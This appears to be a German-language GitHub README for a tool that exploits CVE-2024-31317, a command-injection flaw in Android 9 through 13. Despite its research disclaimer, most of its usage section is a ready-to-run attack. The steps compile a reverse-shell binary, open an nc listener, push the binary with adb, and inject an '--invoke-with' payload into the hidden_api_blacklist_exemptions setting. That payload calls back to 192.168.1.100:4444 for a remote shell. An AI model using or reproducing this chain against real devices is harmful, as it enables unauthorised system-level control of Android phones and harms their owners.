
Automatisiertes Bereitstellungstool für CVE-2024-31317, eine Command-Injection-Schwachstelle in Android 9-13. Enthält Reverse-Shell-Payload, Kompilierungsskript und technische Analyse für Sicherheitsforschung und Bildung.
Dieses Projekt dient ausschließlich Zwecken der Sicherheitsforschung und Bildung. Die Verwendung dieses Tools für unbefugte Tests ist illegal. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden.
CVE-2024-31317 ist eine schwerwiegende Sicherheitslücke, die Geräte mit Android 9 bis Android 13 betrifft. Sie ermöglicht Anwendungen mit der Berechtigung WRITE_SECURE_SETTINGS, durch Befehlsinjektion Systemrechte zu erlangen und Code auszuführen.
Dieses Projekt bietet eine detaillierte technische Analyse der Schwachstelle, Proof-of-Concept-Code sowie automatisierte Bereitstellungswerkzeuge.
CVE-2024-31317-Deployer/
├── README.md
├── LICENSE
├── VULNERABILITY_ANALYSIS.md
├── reverse_shell.c
├── compile.sh
├── payloads/
├── scripts/
└── docs/
git clone https://github.com/fcy10012/CVE-2024-31317-Deployer.git
cd CVE-2024-31317-Deployer
chmod +x compile.sh
./compile.sh
# 启动监听器
nc -lvnp 4444
# 推送并执行
adb push bin/reverse_shell_arm64 /data/local/tmp/reverse_shell
adb shell chmod 755 /data/local/tmp/reverse_shell
# 注入payload
adb shell settings put global hidden_api_blacklist_exemptions "L*\n--invoke-with /data/local/tmp/reverse_shell 192.168.1.100 4444"
# 触发漏洞
adb shell stop && adb shell start
Dieses Projekt dient ausschließlich der Sicherheitsforschung und Bildung. Durch die Verwendung dieses Tools erklären Sie sich damit einverstanden:
Dieses Projekt ist unter der MIT-Lizenz lizenziert – Details finden Sie in der Datei LICENSE
fcy10012 - GitHub
Referenzprojekt: WebLDix/CVE-2024-31317-PoC-Deployer
⭐ Wenn Ihnen dieses Projekt hilft, geben Sie ihm bitte einen Stern!